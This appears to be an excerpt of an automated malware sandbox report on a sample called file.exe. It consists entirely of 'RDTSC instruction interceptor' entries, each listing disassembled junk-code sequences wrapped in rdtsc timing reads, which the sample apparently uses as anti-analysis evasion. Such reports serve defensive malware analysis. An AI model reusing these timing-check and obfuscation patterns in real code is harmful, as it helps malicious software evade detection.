Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52907F3 second address: 5290815 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dl 0x00000005 mov edi, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4E04C4CC05h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290815 second address: 5290842 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 mov ah, 29h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebp 0x0000000c pushad 0x0000000d movzx esi, bx 0x00000010 jmp 00007F4E04B2CB23h 0x00000015 popad 0x00000016 mov dword ptr [esp], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290842 second address: 5290848 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290848 second address: 52908C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, al 0x00000005 push ebx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F4E04B2CB1Ah 0x00000012 and ax, 2638h 0x00000017 jmp 00007F4E04B2CB1Bh 0x0000001c popfd 0x0000001d call 00007F4E04B2CB28h 0x00000022 pushfd 0x00000023 jmp 00007F4E04B2CB22h 0x00000028 or ecx, 2282DFC8h 0x0000002e jmp 00007F4E04B2CB1Bh 0x00000033 popfd 0x00000034 pop esi 0x00000035 popad 0x00000036 mov dword ptr [esp], ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c jmp 00007F4E04B2CB20h 0x00000041 mov dh, cl 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52908C8 second address: 52908CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52908CE second address: 52908D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 529090D second address: 5290925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4E04C4CC04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290925 second address: 5290929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290929 second address: 529095C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a pushad 0x0000000b mov esi, edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F4E04C4CBFFh 0x00000015 jmp 00007F4E04C4CC03h 0x0000001a popfd 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5280E7C second address: 5280E8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5280E8B second address: 5280EC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F4E04C4CBFCh 0x0000000f xchg eax, ecx 0x00000010 jmp 00007F4E04C4CC00h 0x00000015 push eax 0x00000016 jmp 00007F4E04C4CBFBh 0x0000001b xchg eax, ecx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f mov ax, D991h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5280EC6 second address: 5280F0E instructions: 0x00000000 rdtsc 0x00000002 mov bh, ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F4E04B2CB23h 0x0000000c or eax, 7031717Eh 0x00000012 jmp 00007F4E04B2CB29h 0x00000017 popfd 0x00000018 popad 0x00000019 mov dword ptr [ebp-04h], 55534552h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov al, bl 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290E53 second address: 5290E59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290E59 second address: 5290E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290E5D second address: 5290E7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04C4CC03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290E7E second address: 5290E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290E82 second address: 5290E86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290E86 second address: 5290E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290E8C second address: 5290EBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04C4CBFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [7544459Ch], 05h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4E04C4CC07h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290EBA second address: 5290F0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4E04B2CB1Fh 0x00000009 adc cx, EAFEh 0x0000000e jmp 00007F4E04B2CB29h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 je 00007F4E74C7A626h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F4E04B2CB28h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290F0F second address: 5290F15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290F15 second address: 5290F19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0008 second address: 52A0033 instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jmp 00007F4E04C4CC00h 0x0000000c popad 0x0000000d push 5DE6591Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4E04C4CBFCh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0033 second address: 52A007D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 175D430Bh 0x00000010 jmp 00007F4E04B2CB26h 0x00000015 call 00007F4E74C72629h 0x0000001a push 753E2B70h 0x0000001f push dword ptr fs:[00000000h] 0x00000026 mov eax, dword ptr [esp+10h] 0x0000002a mov dword ptr [esp+10h], ebp 0x0000002e lea ebp, dword ptr [esp+10h] 0x00000032 sub esp, eax 0x00000034 push ebx 0x00000035 push esi 0x00000036 push edi 0x00000037 mov eax, dword ptr [75444538h] 0x0000003c xor dword ptr [ebp-04h], eax 0x0000003f xor eax, ebp 0x00000041 push eax 0x00000042 mov dword ptr [ebp-18h], esp 0x00000045 push dword ptr [ebp-08h] 0x00000048 mov eax, dword ptr [ebp-04h] 0x0000004b mov dword ptr [ebp-04h], FFFFFFFEh 0x00000052 mov dword ptr [ebp-08h], eax 0x00000055 lea eax, dword ptr [ebp-10h] 0x00000058 mov dword ptr fs:[00000000h], eax 0x0000005e ret 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F4E04B2CB27h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A007D second address: 52A0083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0083 second address: 52A0087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A011D second address: 52A0178 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4E04C4CC03h 0x00000009 add ch, 0000006Eh 0x0000000c jmp 00007F4E04C4CC09h 0x00000011 popfd 0x00000012 jmp 00007F4E04C4CC00h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test al, al 0x0000001c pushad 0x0000001d mov dl, EDh 0x0000001f popad 0x00000020 je 00007F4E74D81411h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b mov eax, ebx 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0178 second address: 52A017E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A017E second address: 52A0182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0182 second address: 52A01EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp+08h], 00002000h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F4E04B2CB23h 0x00000018 sub si, BD8Eh 0x0000001d jmp 00007F4E04B2CB29h 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007F4E04B2CB20h 0x00000029 or ax, 3008h 0x0000002e jmp 00007F4E04B2CB1Bh 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0B91 second address: 52B0BAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04C4CC09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0BAE second address: 52B0BE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4E04B2CB21h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4E04B2CB1Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0BE5 second address: 52B0C02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04C4CC01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0C02 second address: 52B0C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0C06 second address: 52B0C19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04C4CBFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0C19 second address: 52B0C46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4E04B2CB1Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0C46 second address: 52B0C4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0C4C second address: 52B0C50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0C50 second address: 52B0C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4E04C4CC06h 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0C76 second address: 52B0C7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0C7A second address: 52B0C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0C80 second address: 52B0C86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0C86 second address: 52B0C97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0C97 second address: 52B0C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0C9B second address: 52B0CA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0CA1 second address: 52B0CD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4E04B2CB1Ch 0x00000008 pop ecx 0x00000009 mov ax, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f test esi, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4E04B2CB28h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0CD3 second address: 52B0D17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4E04C4CC01h 0x00000008 pop eax 0x00000009 mov edx, 168A7EE4h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 je 00007F4E74D7A2BDh 0x00000017 jmp 00007F4E04C4CC03h 0x0000001c cmp dword ptr [7544459Ch], 05h 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 movzx eax, di 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0D17 second address: 52B0D87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4E04B2CB26h 0x00000008 pushfd 0x00000009 jmp 00007F4E04B2CB22h 0x0000000e jmp 00007F4E04B2CB25h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 je 00007F4E74C72251h 0x0000001d pushad 0x0000001e jmp 00007F4E04B2CB1Ch 0x00000023 mov si, 0B21h 0x00000027 popad 0x00000028 xchg eax, esi 0x00000029 jmp 00007F4E04B2CB1Ch 0x0000002e push eax 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 mov ch, bh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0E3A second address: 52B0E40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0E40 second address: 52B0E5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov di, 9510h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68FEE0A second address: 68FEE12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 68FEE12 second address: 68FEE16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 691CDD6 second address: 691CDFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4E04C4CBF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4E04C4CC08h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 691D0CA second address: 691D0D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 691D0D3 second address: 691D0D8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 691D3B8 second address: 691D3BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 691F16E second address: 691F173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 691F173 second address: 691F185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jbe 00007F4E04B2CB16h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 691F185 second address: 691F24C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F4E04C4CBFCh 0x0000000c jnl 00007F4E04C4CBF6h 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F4E04C4CBF8h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e adc edi, 6599F867h 0x00000034 push 00000000h 0x00000036 mov esi, ebx 0x00000038 push 8F06455Bh 0x0000003d push eax 0x0000003e jmp 00007F4E04C4CC08h 0x00000043 pop eax 0x00000044 add dword ptr [esp], 70F9BB25h 0x0000004b jmp 00007F4E04C4CC00h 0x00000050 push 00000003h 0x00000052 mov ecx, 71139487h 0x00000057 mov cx, 8174h 0x0000005b push 00000000h 0x0000005d sub esi, dword ptr [ebp+122D2AE0h] 0x00000063 jmp 00007F4E04C4CBFDh 0x00000068 push 00000003h 0x0000006a mov dl, cl 0x0000006c call 00007F4E04C4CBF9h 0x00000071 push eax 0x00000072 push edx 0x00000073 pushad 0x00000074 jbe 00007F4E04C4CBF6h 0x0000007a jmp 00007F4E04C4CC07h 0x0000007f popad 0x00000080 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 691F24C second address: 691F27F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4E04B2CB1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F4E04B2CB29h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 691F27F second address: 691F284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 691F388 second address: 691F38D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 691F38D second address: 691F3E2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F4E04C4CC03h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F4E04C4CC01h 0x00000011 push 00000000h 0x00000013 or di, 3FCCh 0x00000018 push 1528559Fh 0x0000001d pushad 0x0000001e pushad 0x0000001f jl 00007F4E04C4CBF6h 0x00000025 jmp 00007F4E04C4CC01h 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e pop eax 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 691F3E2 second address: 691F469 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4E04B2CB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xor dword ptr [esp], 1528551Fh 0x00000012 cld 0x00000013 push 00000003h 0x00000015 mov esi, dword ptr [ebp+122D2627h] 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007F4E04B2CB18h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 00000015h 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 mov ecx, 129C487Ch 0x0000003c or dword ptr [ebp+122D1F81h], edx 0x00000042 push 00000003h 0x00000044 jmp 00007F4E04B2CB25h 0x00000049 push ecx 0x0000004a cld 0x0000004b pop edi 0x0000004c call 00007F4E04B2CB19h 0x00000051 push eax 0x00000052 push edx 0x00000053 jng 00007F4E04B2CB2Dh 0x00000059 jmp 00007F4E04B2CB27h 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 691F469 second address: 691F494 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F4E04C4CBFAh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F4E04C4CC06h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 691F494 second address: 691F4B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push esi 0x0000000d jmp 00007F4E04B2CB1Ah 0x00000012 pop esi 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 pushad 0x00000017 push edx 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 693E64C second address: 693E652 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 693E7B2 second address: 693E7B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 693E7B6 second address: 693E7C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F4E04C4CBF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 693E7C5 second address: 693E7CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 693EC41 second address: 693EC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4E04C4CBFDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 693EC52 second address: 693EC56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 693EE06 second address: 693EE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 693F1C5 second address: 693F1CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 693F1CD second address: 693F1DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F4E04C4CBFCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 693F334 second address: 693F340 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4E04B2CB1Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 693F340 second address: 693F351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F4E04C4CC49h 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
